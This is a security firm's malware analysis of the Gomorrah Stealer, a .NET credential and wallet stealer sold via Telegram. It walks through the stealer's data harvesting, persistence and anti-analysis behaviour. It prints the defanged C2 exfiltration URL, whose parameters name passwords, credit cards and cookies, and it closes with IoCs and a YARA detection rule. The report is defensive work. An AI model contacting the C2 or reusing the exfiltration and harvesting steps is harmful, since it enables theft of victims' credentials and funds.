Self Assessment

Gomorrah Stealer v5.1: An In-Depth Analysis of a .NET-Based Malware

Published On : 2024-09-13
Share :
Gomorrah Stealer v5.1: An In-Depth Analysis of a .NET-Based Malware

Executive Summary

At Cyfirma, we are dedicated to providing current insights into prevalent threats and the strategies employed by malicious entities targeting both organizations and individuals. This report provides a comprehensive analysis of the Gomorrah Stealer, an information-stealing malware that operates within a malware-as-a-service (MaaS) framework and targets a range of sensitive data on infected systems. The stealer’s primary function is to extract and exfiltrate information, such as passwords, credit card details, and cookies from web browsers and other applications. This report will explore the stealer’s behavior, its methods of data collection and concealment, and the overall impact on affected systems, providing valuable insights into the malware’s functionality and persistence strategies.

Introduction

Gomorrah Stealer is a sophisticated malware, designed to exfiltrate sensitive information from compromised systems. It employs various evasion techniques and gathers data about the installed programs from the Windows registry, as well as collects additional information from web browsers, VPNs, cryptocurrency wallets, and configuration files.

For data concealment, the stealer compresses and uploads the collected information to a remote server, and subsequently deletes the local files to obscure its activities. To ensure persistence, it establishes an autorun mechanism that allows it to reactivate after a system reboot. The stealer also integrates anti-analysis measures to detect and terminate processes associated with security analysis or debugging environments. This report explores the stealer’s operational methods, data collection processes, and persistence strategies, offering a comprehensive overview of its impact and functionality.

Key Findings

  • Gomorrah stealer is a potent malware, functioning as a malware-as-a-service (MaaS) tool, designed to covertly exfiltrate a wide range of sensitive data from compromised systems.
  • It targets data from web browsers, cryptocurrency wallets, VPN clients, messaging apps, and FTP client data.
  • This malware is sold through and supported via Telegram.
  • Gomorrah Stealer is created using .NET with pure IL code and relies on Just-In-Time (JIT) compilation at runtime to execute its functionality, which provides a defense against static analysis.
  • The malware employs anti-analysis measures by frequently checking for debugging or analysis environments.
  • The malware establishes persistence by creating an Autorun registry entry, ensuring it executes automatically after the system reboots.
  • Gomorrah stealer uploads stolen data to a command-and-control server (C2).
  • The stealer compresses the collected data into a zip archive before uploading it to a remote server and deletes local files post-upload to hide its activities.
  • It sends and receives updates and instructions from the C2 server.

ETLM Attribution

Gomorrah stealer is being sold on a Telegram channel which had 834 subscribers at the time of writing.

Telegram channel

In an old post, the threat actor mentions a website as the official website for the Gomorrah stealer:

Telegram post

https[:]//www[.]Gomorrah[.]pw was down at the time of writing, but the archived page shows the snippet of the website:

Archive page: Gomorrah[.]pw

The C2 identified in this study also reveals the login panel for its subscribers:

C2 login panel: https[:]//rougecommunications[.]org/webpanel/Panel/login[.]php

A recent change in the login panel captured by the CYFIRMA research team also indicates that the malware could be renamed (or new versions will be named “Lucifer”):

Change in the login panel

‘Lucifer’ is used by the threat actor as a malware name for the very first version of the malware released:

Telegram post: versions

An announcement has been made by the threat actor on their Telegram page about the upcoming version of the Gomorrah stealer (v5.5):

Telegram post: update announcement

The threat actor also has other social media pages to promote it, such as YouTube and Facebook:

YouTube channel

Facebook page

As per the older Telegram post, the name of the threat actor is ‘Lucifer’ which is also used for initial malware names. This is also seen on the Facebook page.

A Telegram post: Lucifer

Threat Landscape:
The landscape in which the Gomorrah Stealer has arisen reflects a rapidly evolving and increasingly complex environment. As a sophisticated piece of malware, Gomorrah Stealer leverages advanced techniques to evade detection and enhance its effectiveness. By utilizing a .NET-based pure Intermediate Language (IL) code and relying on JIT compilation, it effectively guards against static analysis, and recently the threat actor announced an upcoming version of the stealer with updated features, indicating ongoing development and refinement. This ongoing adaptability highlights the persistent challenges in cybersecurity and emphasizes the necessity for continuous vigilance and evolving defense strategies.

Analysis of Gomorrah Stealer

File Analysis
File Name update_windows10.exe
File Size 550.55 KB (563760 bytes)
Signed Not signed
MD5 e02089570b24b11d6350337069b7e823
SHA-256 2f8a79b12a7a989ac7e5f6ec65050036588a92e65aeb6841e08dc228ff0e21b4
Compiler-Time Stamp 01-07-2023

The primary specimen of the Gomorrah stealer is a 32-bit .NET executable which is protected using .NET Reactor to prevent the specimen from analysis/reverse engineering, and requires administrator privileges for execution:

The specimen is IL-only .NET code, meaning it consists solely of Intermediate Language (IL) and is compiled in native code by the .NET runtime upon execution. The only import in IAT (import address table) ‘_CorExeMain’ indicates that the executable is intended to run with the .NET runtime:

Import table

Reliance on pure IL code and having only one import in the IAT are effective anti-analysis measures against static-analysis techniques.

This executable consists of four sections, with the .text section comprising 96.90% of the file. It contains two executable files:

.text section

We extracted the executable files from the .text section, with the following details:

1. Newtonsoft.Json.dll
File Size: 382.35 KB
MD5: 201fb3d8b93205488e1a6a408ce18539
SHA256: 62c6aebb6bcc4d2faf985a4af59b111ae1e162419acfae7e7f126189073bddf1

2. Zip.exe
File Size: 30.85 KB
MD5: b479fa60615c730d0417b67c1a26274f
SHA256: dc33943da400ea506484952ba242737460c73dd2b3e88c16f0f18a0fd6dc459c

Both the extracted files are .NET executables and have not been detected by security vendors.

The overlay section of the specimen contains the URL “http[:]//rougecommunications[.]org/webpanel”:

Overlay data

Behavioral & Code Analysis

1st Stage Execution:
Initially, the .NET runtime takes over the execution process by loading the necessary assemblies, initializing the Common Language Runtime (CLR), and setting up the execution environment for the .NET application.

After initialization, the WinHttpOpen function is called to initialize a WinHTTP session, and then the Winsock API send() is used to check the IP address information of the host machine:

Getting IP details

2nd Stage Execution:
At the second stage, the executable drops the DLL file “Newtonsoft.Json.dll” into the Temp directory of the current user (C:\Users\user\AppData\Local\Temp):

Dropping DLL

This file is the one we extracted from the .text section of the executable. However, the file hash differs due to variations in the relocation section, typically indicating that the executables were compiled or linked with different base addresses, as well as differences in the overlay data that contains the certificate (signed file). It also drops the same DLL into the current working directory, such as the Desktop.

The dropped DLL, Newtonsoft.Json.dll, is a well-known .NET library distributed by Microsoft. It is widely used for handling JSON (JavaScript Object Notation) in .NET applications due to its efficiency and ease of use with C#, VB.NET, and other .NET languages.

Then, the executable moves itself from the current working directory (such as Desktop) to the Temp directory (C:\Users\user\AppData\Local\Temp), while the executable process continues running.

This occurs because the running process is independent of the file’s physical location on the disk and relies on the file’s handle rather than its path. This allows the executable to be moved or deleted without affecting the ongoing process.

Moving/renaming malware executable

It also renames itself using the format update_YYDDHH, where YY represents the last two digits of the year, DD represents the day of the month, and HH represents the hour. For example, if the year is 2024, the day is the 10th, and the hour is 09, the executable would rename itself as update_240910.

3rd Stage Execution:
The specimen creates a directory under the user’s Temp directory (C:\Users\user\AppData\Local\Temp). The directory name is based on the country code retrieved from the IP address details and the system time, which is obtained using the GetSystemTimeAsFileTime function:

Creating directory

It also creates subdirectories with names such as Browser and Files, where the stealer collects data from the compromised host:

Creating subdirectory

Creating subdirectory

4th Stage Execution: (Data Collection)
The stealer starts harvesting data from the host. It begins by collecting the data about the installed program on the host by reading the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall registry:

Reading installed program via uninstall registry

It writes the gathered details about the installed programs, such as program name, install date and version, to the ProgramList.txt file in the IN_1F8BFBFF000806C1 folder:

Logging gathered data

It then logs the list of running processes to the ProsessList.txt file (a typo by the threat actor 😊 in the file name):

Logging gathered data

The stealer enumerates the host for web browser data by attempting to read file attributes related to specific web browsers in the designated directories. It collects information such as login credentials, passwords, and cookies:

Enumerating system for browser data

The stealer also attempts to read the key used to encrypt stored passwords (such as in Firefox) and logs the unencrypted details:

Reading encryption key from Firefox

Logs decrypted data

It also collects data from other programs, such as VPNs, and cryptocurrency wallets:

Logging gathered data

The stealer also collects .ini files to gather a range of sensitive information, such as configuration settings, authentication details, and license keys:

Gathering .ini files

The system information such as PC name, processor, operating system version, antivirus, and firewall, is also collected by the stealer in the info.txt file:

Logging system information

Additionally, it takes screenshots and saves them as Screenshot.png in the IN_1F8BFBFF000806C1 folder:

Taking screenshots

Next, it drops zip.exe in the Temp folder. This file is one of those we extracted from the .text section of the executable. However, the file hash differs due to variations in the relocation section:

Dropping zip.exe in the Temp folder

Zip.exe is executed as the child process of the stealer:

Executing zip.exe

Zip.exe checks for the IP details of the host, loads the clrcompression.dll (for compression functionality), and compresses the folder IN_1F8BFBFF000806C1 as a zip archive:

Creating zip archive

The following applications and services are targeted by the Gomorrah stealer:

  • Web Browsers: Opera, Edge, Mozilla Firefox, Google Chrome, Chromium, Yandex, Iridium, Epic, Sputnik, 7star, CentBrowser, Orbitum, Kometa, Torch, Amigo, Vivaldi, Chedot, Comodo Dragon, CocCoc Browser, Element Browser, Uran.
  • Cryptocurrency & Wallets: Bitcoin, Armory, Electrum, Ethereum, Zcash, Dash, Monero.
  • VPNs: Proton VPN, OpenVPN.
  • Messaging: Outlook.
  • FTP/File Management: FileZilla.

Exfiltration:

The malware process (update_windows10.exe) reads the compressed file IN_1F8BFBFF000806C1.zip, and the URI:

Reading zip archive

An unhandled exception occurred as “the URI format could not be determined”:

The stealer connects to the C2 server rougecommunications[.]org, sends details about the stolen data – such as passwords, credit card information, and cookies – via the URL, and uploads the compressed archive:

Data exfiltration URL:
http[:]//rougecommunications[.]org/webpanel//logs.php?hwid=IN1F8BFBFF000806C1&Passwords=*&CreditCards=*&Cookies=*&AutoFill=*&Wallets=*

After uploading the data to the C2, it deletes the files, including dropped executables and the compressed archive:

Deleting harvested data

Persistence:

For persistence, the Gomorrah stealer creates an Autorun registry entry, enabling the malware to execute after a system reboot:

Persistence using the Windows registry

Anti-Analysis:

Gomorrah stealer calls APIs, such as GetTickCount, GetSystemInfo frequently to detect and terminate the malware process if it identifies an analysis environment or Debugger:

It also calls IsProcessorFeaturePresent to verify the virtual environment:

Gomorrah-Stealer Capabilities

Analyzing the Gomorrah stealer offers important insights into its operational features. Based on this analysis, the following points highlight the capabilities of this information-stealing malware:

  1. Targets and steals a wide range of sensitive information, including web browser data, cryptocurrency wallet details, VPN client information, messaging app data, and FTP client data.
  2. Collects configuration settings, authentication information, and license keys from .ini files.
  3. Captures system information, such as PC name, processor details, operating system version, antivirus, and firewall settings.
  4. Creates Autorun registry entries to ensure automatic execution after system reboots.
  5. Creates and manages directories in the TEMP folder to store and organize harvested data.
  6. Detects debugger and analysis environment.
  7. Utilizes .NET-based pure IL code and JIT compilation to evade static analysis.
  8. Exfiltrate harvested data and send and receive updates and instructions from the C2 server.

Conclusion

The examination of the Gomorrah stealer reveals a sophisticated and versatile information-stealing malware that operates as a MaaS tool. Gomorrah Stealer represents an evolving threat in the cybersecurity landscape, demonstrating advanced capabilities and a high level of adaptability. Through its use of .NET-based pure IL code and JIT compilation, the stealer effectively evades static analysis and detection, showcasing its technical sophistication. Its persistence strategies, including the creation of Autorun registry entries and relocation of its executables, ensure that it maintains a foothold on compromised systems. The malware’s ability to collect and exfiltrate a wide range of sensitive information—from web browsers, cryptocurrency wallets, and configuration files to system details—illustrates its broad and potentially damaging impact.

Furthermore, Gomorrah Stealer’s distribution as MaaS through the Telegram channel highlights the commercial aspect of modern cyber threats, making sophisticated malware accessible to a wider audience. The threat actor’s announcement of an updated version with new features underscores the ongoing development and enhancement of the stealer, emphasizing the need for continuous vigilance in the face of evolving threats.

As threats like Gomorrah stealer continue to evolve, it is important for organizations to implement robust cybersecurity measures and proactive defense strategies to mitigate the associated risks. To reduce the threat of the Gomorrah stealer, users should exercise caution when opening files from untrusted sources or clicking on unfamiliar links, especially those promoting dubious software or content. Additionally, deploying strong cybersecurity practices – such as using reputable antivirus software, keeping all software up to date, and remaining vigilant against social engineering attacks – can significantly enhance protection against such sophisticated malware.

Indicators Of Compromise

S/N Indicators Type Context
1 e02089570b24b11d6350337069b7e823 File update_windows10.exe
2 2f8a79b12a7a989ac7e5f6ec65050036588a92e65aeb6841e08dc228ff0e21b4 File update_windows10.exe
3 201fb3d8b93205488e1a6a408ce18539 File Newtonsoft.Json.dll
4 62c6aebb6bcc4d2faf985a4af59b111ae1e162419acfae7e7f126189073bddf1 File Newtonsoft.Json.dll
5 b479fa60615c730d0417b67c1a26274f File Zip.exe
6 dc33943da400ea506484952ba242737460c73dd2b3e88c16f0f18a0fd6dc459c File Zip.exe
7 3afd64484a2a34fc34d1155747dd3847 File Zip.exe
8 bf78263914c6d3f84f825504536338fadd15868d788bf30d30613ca27abeb7a9 File Zip.exe
9 rougecommunications[.]org Domain C2
10 172[.]93[.]223[.]99 IP address C2
11 HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender Updater Windows Registry Persistence

MITRE ATT&CK Tactics and Techniques

No. Tactic Technique
1 Reconnaissance (TA0043) T1592: Gather Victim Host Information
2 Execution (TA0002) T1204.002: Malicious File
4 Defense Evasion (TA0005) T1622: Debugger Evasion
T1497: Virtualization/Sandbox Evasion
T1140: Deobfuscate/Decode Files or Information
5 Discovery (TA0007) T1622: Debugger Evasion
T1497: Virtualization/Sandbox Evasion
T1083: File and Directory Discovery
6 Command and Control (TA0011) T1071.001: Web Protocols
7 Exfiltration (TA0010) T1041: Exfiltration Over C2 Channel

YARA Rules

rule Gomorrah Stealer Detection
{
meta:
description = “Detects Gomorrah stealer based on known IoCs”
author = Cyfirma Research

strings:
$md5_1 = “e02089570b24b11d6350337069b7e823”
$md5_2 = “201fb3d8b93205488e1a6a408ce18539”
$md5_3 = “b479fa60615c730d0417b67c1a26274f”
$md5_4 = “3afd64484a2a34fc34d1155747dd3847”
$sha256_1 = “2f8a79b12a7a989ac7e5f6ec65050036588a92e65aeb6841e08dc228ff0e21b4”
$sha256_2 = “62c6aebb6bcc4d2faf985a4af59b111ae1e162419acfae7e7f126189073bddf1”
$sha256_3 = “dc33943da400ea506484952ba242737460c73dd2b3e88c16f0f18a0fd6dc459c”
$sha256_4 = “bf78263914c6d3f84f825504536338fadd15868d788bf30d30613ca27abeb7a9”
$domain = “rougecommunications.org”
$registry = “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Defender Updater”

condition:
any of ($md5_*) or any of ($sha256_*) or $domain or $registry
}

Recommendations

  • Implement threat intelligence to proactively counter the threats associated with the Gomorrah stealer.
  • To protect the endpoints, use robust endpoint security solutions for real-time monitoring and threat detection, such as Antimalware security suit and host-based intrusion prevention system.
  • Continuous monitoring of the network activity with NIDS/NIPS and using the web application firewall to filter/block suspicious activity provides comprehensive protection from compromise due to encrypted payloads.
  • Configure firewalls to block outbound communication to known malicious IP addresses and domains associated with the Gomorrah stealer command and control servers.
  • Implement behavior-based monitoring to detect unusual activity patterns, such as suspicious processes attempting to make unauthorized network connections.
  • Employ application whitelisting to allow only approved applications to run on endpoints, preventing the execution of unauthorized or malicious executables.
  • Conducting vulnerability assessment and penetration testing on the environment periodically helps in hardening the security by finding the security loopholes followed by a remediation process.
  • The use of security benchmarks to create baseline security procedures and organizational security policies is also recommended.
  • Develop a comprehensive incident response plan that outlines steps to take in case of a malware infection, including isolating affected systems and notifying relevant stakeholders.
  • Security awareness and training programs help protect from security incidents, such as social engineering attacks. Organizations should remain vigilant and continuously adapt their defenses to mitigate the evolving threats posed by the Gomorrah stealer malware.
  • Update security patches which can reduce the risk of potential compromise.